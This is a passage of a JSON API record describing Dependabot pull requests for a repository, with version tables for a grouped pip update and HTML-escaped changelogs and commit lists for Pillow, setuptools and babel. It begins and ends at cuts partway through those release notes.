href=\"https://github.com/scaramallion\"\u003e\u003ccode\u003e@​scaramallion\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed joined corners for ImageDraw rounded_rectangle() non-integer dimensions \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7881\"\u003e#7881\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemoved Python and NumPy pinning on Cygwin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7880\"\u003e#7880\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUpdate UnidentifiedImageError and \u003cstrong\u003eversion\u003c/strong\u003e imports \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7644\"\u003e#7644\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eStop reading EPS image at EOF marker \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7753\"\u003e#7753\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePSD layer co-ordinates may be negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7706\"\u003e#7706\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7791\"\u003e#7791\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eWhen saving GIF frame that restores to background color, do not fill identical pixels \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7788\"\u003e#7788\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed reading PNG iCCP compression method \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7823\"\u003e#7823\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAllow writing IFDRational to UNDEFINED tag \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7840\"\u003e#7840\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix logged tag name when loading Exif data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7842\"\u003e#7842\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse maximum frame size in IHDR chunk when saving APNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7821\"\u003e#7821\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePrevent opening P TGA images without a palette \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7797\"\u003e#7797\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse palette when loading ICO images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7798\"\u003e#7798\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse consistent arguments for load_read and load_seek \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7713\"\u003e#7713\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eTurn off nullability warnings for macOS SDK \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7827\"\u003e#7827\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix shift-sign issue in Convert.c \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7838\"\u003e#7838\u003c/a\u003e [\u003ca href=\"https://github.com/r-barnes\"\u003e\u003ccode\u003e@​r-barnes\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ewinbuild: Refactor dependency versions into constants \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7843\"\u003e#7843\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eBuild macOS arm64 wheels natively \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7852\"\u003e#7852\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed typo \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7855\"\u003e#7855\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eOpen 16-bit grayscale PNGs as I;16 \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7849\"\u003e#7849\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eHandle truncated chunks at the end of PNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7709\"\u003e#7709\u003c/a\u003e [\u003ca href=\"https://github.com/lajiyuan\"\u003e\u003ccode\u003e@​lajiyuan\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eMatch mask size to pasted image size in GifImagePlugin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7779\"\u003e#7779\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca h...\n\n_Description has been truncated_","html_url":"https://github.com/perplext/faraday/pull/2","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/perplext%2Ffaraday/issues/2","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2/packages"}},{"old_version":"1.4.30","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-08-09T17:26:33.000Z","version_change":"1.4.30 → 1.11.0","issue":{"uuid":"2732831894","node_id":"PR_kwDOAsEugc6i47SW","number":1,"state":"open","title":"Bump the pip group across 2 directories with 19 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-09T17:26:33.000Z","updated_at":"2025-08-09T17:26:34.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":19,"packages":[{"name":"setuptools","old_version":"18.3.1","new_version":"78.1.1","repository_url":"https://github.com/pypa/setuptools"},{"name":"babel","old_version":"2.0","new_version":"2.17.0","repository_url":"https://github.com/python-babel/babel"},{"name":"bleach","old_version":"1.4.1","new_version":"6.2.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"celery","old_version":"3.1.18","new_version":"5.5.3","repository_url":"https://github.com/celery/celery"},{"name":"certifi","old_version":"2015.9.6.1","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"django","old_version":"1.8.5","new_version":"4.2.22","repository_url":"https://github.com/django/django"},{"name":"django-grappelli","old_version":"2.7.1","new_version":"2.15.2","repository_url":"https://github.com/sehmaschine/django-grappelli"},{"name":"djangorestframework","old_version":"3.2.3","new_version":"3.15.2","repository_url":"https://github.com/encode/django-rest-framework"},{"name":"gitpython","old_version":"0.1.7","new_version":"3.1.41","repository_url":"https://github.com/gitpython-developers/GitPython"},{"name":"html5lib","old_version":"0.999999","new_version":"0.999999999","repository_url":"https://github.com/html5lib/html5lib-python"},{"name":"requests","old_version":"2.7.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.8","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"py","old_version":"1.4.30","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"pyyaml","old_version":"3.11","new_version":"6.0.2","repository_url":"https://github.com/yaml/pyyaml"},{"name":"virtualenv","old_version":"13.1.2","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"},{"name":"jinja2","old_version":"2.5.5","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"lxml","old_version":"3.4.4","new_version":"4.9.1","repository_url":"https://github.com/lxml/lxml"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 17 updates in the /requirements directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [setuptools](https://github.com/pypa/setuptools) | `18.3.1` | `78.1.1` |\n| [babel](https://github.com/python-babel/babel) | `2.0` | `2.17.0` |\n| [bleach](https://github.com/mozilla/bleach) | `1.4.1` | `6.2.0` |\n| [celery](https://github.com/celery/celery) | `3.1.18` | `5.5.3` |\n| [certifi](https://github.com/certifi/python-certifi) | `2015.9.6.1` | `2024.7.4` |\n| [django](https://github.com/django/django) | `1.8.5` | `4.2.22` |\n| [django-grappelli](https://github.com/sehmaschine/django-grappelli) | `2.7.1` | `2.15.2` |\n| [djangorestframework](https://github.com/encode/django-rest-framework) | `3.2.3` | `3.15.2` |\n| [gitpython](https://github.com/gitpython-developers/GitPython) | `0.1.7` | `3.1.41` |\n| [html5lib](https://github.com/html5lib/html5lib-python) | `0.999999` | `0.999999999` |\n| [requests](https://github.com/psf/requests) | `2.7.0` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.8` | `2.5.0` |\n| [py](https://github.com/pytest-dev/py) | `1.4.30` | `1.11.0` |\n| [pyyaml](https://github.com/yaml/pyyaml) | `3.11` | `6.0.2` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `13.1.2` | `20.26.6` |\n| [jinja2](https://github.com/pallets/jinja) | `2.5.5` | `3.1.6` |\n| [lxml](https://github.com/lxml/lxml) | `3.4.4` | `4.9.1` |\n\nBumps the pip group with 6 updates in the /smoketests directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2015.9.6.2` | `2024.7.4` |\n| [requests](https://github.com/psf/requests) | `2.8.1` | `2.32.4` |\n| [py](https://github.com/pytest-dev/py) | `1.4.30` | `1.11.0` |\n| [pyyaml](https://github.com/yaml/pyyaml) | `3.11` | `6.0.2` |\n| [pyopenssl](https://github.com/pyca/pyopenssl) | `0.15.1` | `25.1.0` |\n| [rsa](https://github.com/sybrenstuvel/python-rsa) | `3.2` | `4.9.1` |\n\n\nUpdates `setuptools` from 18.3.1 to 78.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/setuptools/blob/main/NEWS.rst\"\u003esetuptools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev78.1.1\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMore fully sanitized the filename in PackageIndex._download. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4946\"\u003e#4946\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.1.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRestore access to _get_vc_env with a warning. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4874\"\u003e#4874\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.0.2\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePostponed removals of deprecated dash-separated and uppercase fields in \u003ccode\u003esetup.cfg\u003c/code\u003e.\nAll packages with deprecated configurations are advised to move before 2026. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4911\"\u003e#4911\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.0.1\u003c/h1\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4909\"\u003e#4909\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev78.0.0\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReverted distutils changes that broke the monkey patching of command classes. (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4902\"\u003e#4902\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDeprecations and Removals\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSetuptools no longer accepts options containing uppercase or dash characters in \u003ccode\u003esetup.cfg\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/8e4868a036b7fae3208d16cb4e5fe6d63c3752df\"\u003e\u003ccode\u003e8e4868a\u003c/code\u003e\u003c/a\u003e Bump version: 78.1.0 → 78.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/100e9a61ad24d5a147ada57357425a8d40626d09\"\u003e\u003ccode\u003e100e9a6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4951\"\u003e#4951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/8faf1d7e0ca309983252e4f21837b73ee12e960f\"\u003e\u003ccode\u003e8faf1d7\u003c/code\u003e\u003c/a\u003e Add news fragment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/2ca4a9fe4758fcd39d771d3d3a5b4840aacebdf7\"\u003e\u003ccode\u003e2ca4a9f\u003c/code\u003e\u003c/a\u003e Rely on re.sub to perform the decision in one expression.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/e409e8002932f2b86aae7b1abc8f8c2ebf96df2c\"\u003e\u003ccode\u003ee409e80\u003c/code\u003e\u003c/a\u003e Extract _sanitize method for sanitizing the filename.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b\"\u003e\u003ccode\u003e250a6d1\u003c/code\u003e\u003c/a\u003e Add a check to ensure the name resolves relative to the tmpdir.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/d8390feaa99091d1ba9626bec0e4ba7072fc507a\"\u003e\u003ccode\u003ed8390fe\u003c/code\u003e\u003c/a\u003e Extract _resolve_download_filename with test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/4e1e89392de5cb405e7844cdc8b20fc2755dbaba\"\u003e\u003ccode\u003e4e1e893\u003c/code\u003e\u003c/a\u003e Merge \u003ca href=\"https://github.com/jaraco/skeleton\"\u003ehttps://github.com/jaraco/skeleton\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/3a3144f0d2887fa37c06550f42a101e9eebd953a\"\u003e\u003ccode\u003e3a3144f\u003c/code\u003e\u003c/a\u003e Fix typo: \u003ccode\u003epyproject.license\u003c/code\u003e -\u0026gt; \u003ccode\u003eproject.license\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pypa/setuptools/issues/4931\"\u003e#4931\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/setuptools/commit/d751068fd2627d6d8f1729e39cbcd8119049998f\"\u003e\u003ccode\u003ed751068\u003c/code\u003e\u003c/a\u003e Fix typo: pyproject.license -\u0026gt; project.license\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/setuptools/compare/18.3.1...v78.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.0 to 2.17.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.17.0\u003c/h2\u003e\n\u003cp\u003eHappy 2025! This release is being made from FOSDEM 2025, in Brussels, Belgium. 🇧🇪\u003c/p\u003e\n\u003cp\u003eThank you to all contributors, new and old, and here's to another great year of internationalization and localization!\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003eThe changelog below is auto-generated by GitHub.\u003c/p\u003e\n\u003cp\u003ePlease see \u003ca href=\"https://github.com/python-babel/babel/blob/b50a1d2186c20f3359f7e10853d2b2225a46ed40/CHANGES.rst\"\u003eCHANGELOG.rst\u003c/a\u003e for additional details.\u003c/p\u003e\n\u003chr /\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix deprecation warnings for \u003ccode\u003edatetime.utcnow()\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1119\"\u003epython-babel/babel#1119\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnclose white spaces in references by \u003ca href=\"https://github.com/Dunedan\"\u003e\u003ccode\u003e@​Dunedan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1105\"\u003epython-babel/babel#1105\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003estr.index\u003c/code\u003e with \u003ccode\u003estr.find\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1130\"\u003epython-babel/babel#1130\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace more alternate characters in \u003ccode\u003eformat_skeleton\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1122\"\u003epython-babel/babel#1122\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix extracted lineno with nested calls by \u003ca href=\"https://github.com/dylankiss\"\u003e\u003ccode\u003e@​dylankiss\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1126\"\u003epython-babel/babel#1126\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u0026quot;Deleted duplicate code in test\u0026quot; by \u003ca href=\"https://github.com/mattdiaz007\"\u003e\u003ccode\u003e@​mattdiaz007\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1138\"\u003epython-babel/babel#1138\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix of list index out of range error in PoFileParser.add_message when translations is empty by \u003ca href=\"https://github.com/gabe-sherman\"\u003e\u003ccode\u003e@​gabe-sherman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1135\"\u003epython-babel/babel#1135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake seconds optional in \u003ccode\u003eparse_time\u003c/code\u003e time formats by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1141\"\u003epython-babel/babel#1141\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMark \u003ccode\u003ewraptext\u003c/code\u003e deprecated; use \u003ccode\u003eTextWrapper\u003c/code\u003e directly in \u003ccode\u003ewrite_po\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1140\"\u003epython-babel/babel#1140\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix the way obsolete messages are stored by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1132\"\u003epython-babel/babel#1132\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003eOrderedDict\u003c/code\u003e with just \u003ccode\u003edict\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1149\"\u003epython-babel/babel#1149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse CLDR 46 by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1145\"\u003epython-babel/babel#1145\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate CI to use python 3.13 and Ubuntu 24.04 by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1153\"\u003epython-babel/babel#1153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdjust docs/conf.py to add compatibility with sphinx 8 by \u003ca href=\"https://github.com/hrnciar\"\u003e\u003ccode\u003e@​hrnciar\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1155\"\u003epython-babel/babel#1155\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow specifying an explicit format in parse_date/parse_time by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1131\"\u003epython-babel/babel#1131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSimplify \u003ccode\u003eread_mo\u003c/code\u003e logic regarding \u003ccode\u003ecatalog.charset\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1148\"\u003epython-babel/babel#1148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump CI/tool versions by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1160\"\u003epython-babel/babel#1160\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: check_and_call_extract_file uses the first matching method and options, instead of the first matching method and last matching options by \u003ca href=\"https://github.com/jpmckinney\"\u003e\u003ccode\u003e@​jpmckinney\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1121\"\u003epython-babel/babel#1121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevent wrapping file locations containing white space by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1120\"\u003epython-babel/babel#1120\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd tzdata as dev dependency and sync with tox.ini by \u003ca href=\"https://github.com/wandrew004\"\u003e\u003ccode\u003e@​wandrew004\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1159\"\u003epython-babel/babel#1159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport short and narrow formats for format_timedelta when using \u003ccode\u003eadd_direction\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1163\"\u003epython-babel/babel#1163\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove handling for \u003ccode\u003elocale=None\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1164\"\u003epython-babel/babel#1164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003epytest.raises(match=...)\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1166\"\u003epython-babel/babel#1166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStrip extra leading slashes in \u003ccode\u003e/etc/localtime\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1165\"\u003epython-babel/babel#1165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove redundant assignment in \u003ccode\u003eCatalog.__setitem__\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1167\"\u003epython-babel/babel#1167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSmall cleanups by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1170\"\u003epython-babel/babel#1170\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSmall test 